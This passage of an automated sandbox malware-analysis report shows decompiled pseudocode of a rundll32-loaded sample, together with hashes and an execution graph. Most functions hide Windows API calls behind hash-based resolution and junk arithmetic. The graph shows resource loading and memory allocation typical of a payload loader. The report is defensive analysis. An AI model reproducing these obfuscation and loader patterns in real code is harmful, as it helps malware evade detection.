				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
				return _t34;
			}









                                                                                                                      0x00371e25
                                                                                                                      0x00371e26
                                                                                                                      0x00371e28
                                                                                                                      0x00371e2b
                                                                                                                      0x00371e2d
                                                                                                                      0x00371e30
                                                                                                                      0x00371e33
                                                                                                                      0x00371e37
                                                                                                                      0x00371e38
                                                                                                                      0x00371e3d
                                                                                                                      0x00371e47
                                                                                                                      0x00371e50
                                                                                                                      0x00371e57
                                                                                                                      0x00371e5e
                                                                                                                      0x00371e6a
                                                                                                                      0x00371e72
                                                                                                                      0x00371e7a
                                                                                                                      0x00371e7e
                                                                                                                      0x00371e91
                                                                                                                      0x00371ea0
                                                                                                                      0x00371ea6

                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,003780DB,?,00000000,AF136809), ref: 00371EA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                      • Instruction ID: b6be7ddf827da8a450fb84b786cca6038db036a2a8913b930a5e4fac4bfa0276
                                                                                                                      • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                      • Instruction Fuzzy Hash: 60010476901208FBEB05DFD4DD4A8DE7BB5EB45354F208099F9086A211E7B29F20AB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003846BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 285 3846bb-38473b call 3820b9 call 38aa30 SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E003846BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E003820B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0038AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                      0x003846d5
                                                                                                                      0x003846da
                                                                                                                      0x003846e4
                                                                                                                      0x003846ec
                                                                                                                      0x003846f3
                                                                                                                      0x003846f7
                                                                                                                      0x003846fe
                                                                                                                      0x00384705
                                                                                                                      0x0038470c
                                                                                                                      0x00384724
                                                                                                                      0x00384735
                                                                                                                      0x0038473b

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00384735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1514166925-0
                                                                                                                      • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction ID: 09782a1b4ea3e555b4518fdc90f4ed0ac16dda0e58b05b4e3be04706e9bb403c
                                                                                                                      • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction Fuzzy Hash: AF01EC75801218BBCF15AFD5DC498DFBFB8EF45394F108185F91866211D2758A60DBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003793ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E003793ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0038AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                      0x003793f3
                                                                                                                      0x00379405
                                                                                                                      0x00379411
                                                                                                                      0x00379412
                                                                                                                      0x00379413
                                                                                                                      0x0037941a
                                                                                                                      0x00379421
                                                                                                                      0x00379428
                                                                                                                      0x00379433
                                                                                                                      0x00379436
                                                                                                                      0x0037943d
                                                                                                                      0x00379444
                                                                                                                      0x00379451
                                                                                                                      0x0037945b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 0037945B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction ID: 60a4d0680975cbf6830732f16911f82c1889d872f7ced8ab84c472361a29988a
                                                                                                                      • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction Fuzzy Hash: CEF03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7745F459B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00388F9E Relevance: 1.5, APIs: 1, Instructions: 31serviceCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 55%
                                                                                                                      			E00388F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				unsigned int _v12;
				void* _t19;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t19);
				_v12 = 0xd87912;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0006adfb;
				_v8 = 0xf5ad8e;
				_v8 = _v8 + 0xc481;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00032ff7;
				E0038AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
				_t24 = CloseServiceHandle(_a12); // executed
				return _t24;
			}







                                                                                                                      0x00388fa1
                                                                                                                      0x00388fa2
                                                                                                                      0x00388fa3
                                                                                                                      0x00388fa6
                                                                                                                      0x00388fa9
                                                                                                                      0x00388fad
                                                                                                                      0x00388fae
                                                                                                                      0x00388fb3
                                                                                                                      0x00388fbd
                                                                                                                      0x00388fc6
                                                                                                                      0x00388fcd
                                                                                                                      0x00388fd4
                                                                                                                      0x00388fdb
                                                                                                                      0x00388fdf
                                                                                                                      0x00388ff7
                                                                                                                      0x00389002
                                                                                                                      0x00389007

                                                                                                                      APIs
                                                                                                                      • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00389002
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleService
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1725840886-0
                                                                                                                      • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                      • Instruction ID: 91a8512992be115e742bfc980f6b6b1a51d04d6aae2e4160e8445efda78c8be0
                                                                                                                      • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                      • Instruction Fuzzy Hash: 91F049B191020CFFDF06AFD4C94A89EBBB4EB10308F208198F80566611D6769B64EF51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00381F8A Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E00381F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				int _t25;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t19);
				_v12 = 0x96b134;
				_v12 = _v12 + 0xdeb4;
				_v12 = _v12 | 0x0c5d8169;
				_v12 = _v12 ^ 0x0cdc4dba;
				_v8 = 0xf8ae2a;
				_v8 = _v8 + 0xcab3;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x29e0cf29;
				E0038AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
				_t25 = DeleteFileW(_a4); // executed
				return _t25;
			}







                                                                                                                      0x00381f8d
                                                                                                                      0x00381f8e
                                                                                                                      0x00381f8f
                                                                                                                      0x00381f93
                                                                                                                      0x00381f94
                                                                                                                      0x00381f99
                                                                                                                      0x00381fa3
                                                                                                                      0x00381faf
                                                                                                                      0x00381fb6
                                                                                                                      0x00381fbd
                                                                                                                      0x00381fc4
                                                                                                                      0x00381fda
                                                                                                                      0x00381fdd
                                                                                                                      0x00381fea
                                                                                                                      0x00381ff5
                                                                                                                      0x00381ffa

                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00381FF5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                      • Instruction ID: c650afb2f802a11bdb76b0f47907f5372ec508b12910bfda7ae09b34d41f6f53
                                                                                                                      • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                      • Instruction Fuzzy Hash: 8EF0F9B190120CFBEF18EFD4D9468AEBFB5EB50304F20819AF40467222E7715F549B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00385BFD Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 76%
                                                                                                                      			E00385BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t20;
				struct HINSTANCE__* _t25;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t20);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5faaf9;
				_v20 = 0xab22cd;
				_v12 = 0x8e3542;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00089943;
				_v8 = 0x9b967a;
				_v8 = _v8 ^ 0x4689732a;
				_v8 = _v8 ^ 0x4619bdd7;
				E0038AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
				_t25 = LoadLibraryW(_a8); // executed
				return _t25;
			}










                                                                                                                      0x00385c03
                                                                                                                      0x00385c06
                                                                                                                      0x00385c0a
                                                                                                                      0x00385c0b
                                                                                                                      0x00385c10
                                                                                                                      0x00385c17
                                                                                                                      0x00385c23
                                                                                                                      0x00385c2a
                                                                                                                      0x00385c31
                                                                                                                      0x00385c35
                                                                                                                      0x00385c3c
                                                                                                                      0x00385c43
                                                                                                                      0x00385c4a
                                                                                                                      0x00385c62
                                                                                                                      0x00385c6d
                                                                                                                      0x00385c72

                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 00385C6D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                      • Instruction ID: 882e3058d24d91c190da8d708d6e3ff7a7826cb75016cae2eca5712e9998a69d
                                                                                                                      • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                      • Instruction Fuzzy Hash: 50F0FFB5C0020CFBCF05EFE4DA46AEEBBB4FB40318F108188E91566212D3B54B58DB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0037B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0037B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0038AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                      0x0037b23f
                                                                                                                      0x0037b240
                                                                                                                      0x0037b241
                                                                                                                      0x0037b244
                                                                                                                      0x0037b247
                                                                                                                      0x0037b24a
                                                                                                                      0x0037b24e
                                                                                                                      0x0037b24f
                                                                                                                      0x0037b254
                                                                                                                      0x0037b25e
                                                                                                                      0x0037b26a
                                                                                                                      0x0037b271
                                                                                                                      0x0037b278
                                                                                                                      0x0037b27f
                                                                                                                      0x0037b286
                                                                                                                      0x0037b28d
                                                                                                                      0x0037b294
                                                                                                                      0x0037b29b
                                                                                                                      0x0037b2b3
                                                                                                                      0x0037b2c1
                                                                                                                      0x0037b2c6

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0037B2C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction ID: 990d1e94676dfe5714b5f3eca96472de2481dd2d6cd9bb128b4d258173c82d31
                                                                                                                      • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction Fuzzy Hash: DC011AB2C04708FFDF45DFD4DD468AEBB75EB44304F108189B90566152E3754B609B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00381E67 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E00381E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t23;
				int _t29;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t23);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x62b4e9;
				_v20 = 0xc383c4;
				_v12 = 0x238243;
				_v12 = _v12 * 0x67;
				_v12 = _v12 ^ 0x0e4d658b;
				_v8 = 0x6564d0;
				_v8 = _v8 ^ 0x2b193590;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x8a2acb03;
				E0038AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
				_t29 = CloseHandle(_a12); // executed
				return _t29;
			}










                                                                                                                      0x00381e6d
                                                                                                                      0x00381e70
                                                                                                                      0x00381e73
                                                                                                                      0x00381e77
                                                                                                                      0x00381e78
                                                                                                                      0x00381e7d
                                                                                                                      0x00381e84
                                                                                                                      0x00381e90
                                                                                                                      0x00381e97
                                                                                                                      0x00381ead
                                                                                                                      0x00381eb0
                                                                                                                      0x00381eb7
                                                                                                                      0x00381ebe
                                                                                                                      0x00381ec5
                                                                                                                      0x00381ec9
                                                                                                                      0x00381ed6
                                                                                                                      0x00381ee1
                                                                                                                      0x00381ee6

                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(00C383C4), ref: 00381EE1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                      • Instruction ID: 21b655460f63d0f9eb26e416a72bd96848b0849aad2e13ef303cb57284890a36
                                                                                                                      • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                      • Instruction Fuzzy Hash: 490128B5C00208FBCF40EFE4D94A99EBFB5EB44308F108499E81567212D7758B14DF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23
                                                                                                                      execution_graph 31843 10035042 TlsGetValue 31844 10035076 GetModuleHandleA 31843->31844 31845 10035055 31843->31845 31847 10035085 GetProcAddress 31844->31847 31848 1003509f 31844->31848 31845->31844 31846 1003505f TlsGetValue 31845->31846 31851 1003506a 31846->31851 31849 1003506e 31847->31849 31849->31848 31850 10035095 RtlEncodePointer 31849->31850 31850->31848 31851->31844 31851->31849 31852 10020c26 31855 10020c32 __EH_prolog3 31852->31855 31854 10020c80 31879 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31854->31879 31855->31854 31863 1002083b EnterCriticalSection 31855->31863 31877 100201f1 RaiseException __CxxThrowException@8 31855->31877 31878 1002094b TlsAlloc InitializeCriticalSection 31855->31878 31857 10020c8d 31860 10020c93 31857->31860 31861 10020ca6 ~_Task_impl 31857->31861 31880 100209ed 88 API calls 4 library calls 31860->31880 31868 1002085a 31863->31868 31864 10020916 _memset 31865 1002092a LeaveCriticalSection 31864->31865 31865->31855 31866 10020893 31881 10014460 31866->31881 31867 100208a8 GlobalHandle GlobalUnlock 31870 10014460 ctype 80 API calls 31867->31870 31868->31864 31868->31866 31868->31867 31872 100208c5 GlobalReAlloc 31870->31872 31873 100208cf 31872->31873 31874 100208f7 GlobalLock 31873->31874 31875 100208da GlobalHandle GlobalLock 31873->31875 31876 100208e8 LeaveCriticalSection 31873->31876 31874->31864 31875->31876 31876->31874 31878->31855 31879->31857 31880->31861 31882 10014477 ctype 31881->31882 31883 1001448c GlobalAlloc 31882->31883 31885 10013ba0 80 API calls ctype 31882->31885 31883->31873 31885->31883 31886 10030d06 31887 10030d12 31886->31887 31888 10030d0d 31886->31888 31892 10030c10 31887->31892 31904 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31888->31904 31891 10030d23 31894 10030c1c __close 31892->31894 31893 10030c69 31901 10030cb9 __close 31893->31901 31959 100125c0 31893->31959 31894->31893 31894->31901 31905 10030a37 31894->31905 31898 10030c99 31899 10030a37 __CRT_INIT@12 165 API calls 31898->31899 31898->31901 31899->31901 31900 100125c0 ___DllMainCRTStartup 146 API calls 31902 10030c90 31900->31902 31901->31891 31903 10030a37 __CRT_INIT@12 165 API calls 31902->31903 31903->31898 31904->31887 31906 10030b61 31905->31906 31907 10030a4a GetProcessHeap HeapAlloc 31905->31907 31909 10030b67 31906->31909 31910 10030b9c 31906->31910 31908 10030a6e GetVersionExA 31907->31908 31924 10030a67 31907->31924 31911 10030a89 GetProcessHeap HeapFree 31908->31911 31912 10030a7e GetProcessHeap HeapFree 31908->31912 31917 10030b86 31909->31917 31909->31924 32007 100310be 67 API calls _doexit 31909->32007 31913 10030ba1 31910->31913 31914 10030bfa 31910->31914 31915 10030ab5 31911->31915 31912->31924 31991 10035135 6 API calls __decode_pointer 31913->31991 31914->31924 32026 10035425 79 API calls 2 library calls 31914->32026 31981 10036624 HeapCreate 31915->31981 31917->31924 32008 100389ee 68 API calls ___free_lc_time 31917->32008 31918 10030ba6 31992 10035840 31918->31992 31924->31893 31925 10030aeb 31925->31924 31928 10030af4 31925->31928 31926 10030b90 32009 10035178 70 API calls 2 library calls 31926->32009 31998 1003548e 78 API calls 6 library calls 31928->31998 31930 10030bbe 32011 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31930->32011 31932 10030b95 32010 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31932->32010 31934 10030af9 __RTC_Initialize 31938 10030b0c GetCommandLineA 31934->31938 31951 10030afd 31934->31951 31936 10030bd0 31939 10030bd7 31936->31939 31940 10030bee 31936->31940 32000 10038d66 77 API calls 3 library calls 31938->32000 32012 100351b5 67 API calls 4 library calls 31939->32012 32013 1002fa69 31940->32013 31944 10030b1c 32001 100387ae 72 API calls 3 library calls 31944->32001 31945 10030bde GetCurrentThreadId 31945->31924 31947 10030b26 31948 10030b2a 31947->31948 32003 10038cad 111 API calls 3 library calls 31947->32003 32002 10035178 70 API calls 2 library calls 31948->32002 31999 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31951->31999 31952 10030b36 31953 10030b4a 31952->31953 32004 10038a3a 110 API calls 6 library calls 31952->32004 31958 10030b02 31953->31958 32006 100389ee 68 API calls ___free_lc_time 31953->32006 31956 10030b3f 31956->31953 32005 10030f4d 75 API calls 4 library calls 31956->32005 31958->31924 32052 10006a90 31959->32052 31962 1001265a 32086 1002fe65 105 API calls 5 library calls 31962->32086 31963 1001261c FindResourceW LoadResource SizeofResource 31966 10006a90 ___DllMainCRTStartup 67 API calls 31963->31966 31969 10012744 ___DllMainCRTStartup 31966->31969 31968 1001284d 31968->31898 31968->31900 31970 100127b7 VirtualAlloc 31969->31970 31971 1001279b VirtualAllocExNuma 31969->31971 31972 100127da 31970->31972 31971->31972 32057 1002fb00 31972->32057 31976 100127fa 32080 10002970 31976->32080 31978 10012810 ___DllMainCRTStartup 32083 100026a0 31978->32083 31980 10012664 32087 1002f81e 5 API calls __invoke_watson 31980->32087 31982 10036647 31981->31982 31983 10036644 31981->31983 32027 100365c9 67 API calls 3 library calls 31982->32027 31983->31925 31985 1003664c 31986 10036656 31985->31986 31987 1003667a 31985->31987 32028 10035aca HeapAlloc 31986->32028 31987->31925 31989 10036660 31989->31987 31990 10036665 HeapDestroy 31989->31990 31990->31983 31991->31918 31995 10035844 31992->31995 31994 10030bb2 31994->31924 31994->31930 31995->31994 31996 10035864 Sleep 31995->31996 32029 10030678 31995->32029 31997 10035879 31996->31997 31997->31994 31997->31995 31998->31934 31999->31958 32000->31944 32001->31947 32002->31951 32003->31952 32004->31956 32005->31953 32006->31948 32007->31917 32008->31926 32009->31932 32010->31924 32011->31936 32012->31945 32015 1002fa75 __close 32013->32015 32014 1002faee __close _realloc 32014->31958 32015->32014 32025 1002fab4 32015->32025 32048 10035a99 67 API calls 2 library calls 32015->32048 32016 1002fac9 HeapFree 32016->32014 32018 1002fadb 32016->32018 32051 100311f4 67 API calls __getptd_noexit 32018->32051 32020 1002fae0 GetLastError 32020->32014 32021 1002faa6 32050 1002fabf LeaveCriticalSection _doexit 32021->32050 32022 1002fa8c ___sbh_find_block 32022->32021 32049 10035b3d VirtualFree VirtualFree HeapFree ___sbh_free_block 32022->32049 32025->32014 32025->32016 32026->31924 32027->31985 32028->31989 32030 10030684 __close 32029->32030 32031 1003069c 32030->32031 32039 100306bb _memset 32030->32039 32042 100311f4 67 API calls __getptd_noexit 32031->32042 32033 100306a1 32043 10037753 4 API calls 2 library calls 32033->32043 32035 1003072d RtlAllocateHeap 32035->32039 32038 100306b1 __close 32038->31995 32039->32035 32039->32038 32044 10035a99 67 API calls 2 library calls 32039->32044 32045 100362e6 5 API calls 2 library calls 32039->32045 32046 10030774 LeaveCriticalSection _doexit 32039->32046 32047 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32039->32047 32042->32033 32044->32039 32045->32039 32046->32039 32047->32039 32048->32022 32049->32021 32050->32025 32051->32020 32053 1002f9a6 _malloc 67 API calls 32052->32053 32054 10006aa1 32053->32054 32055 1002fa69 ___free_lc_time 67 API calls 32054->32055 32056 10006aad 32054->32056 32055->32056 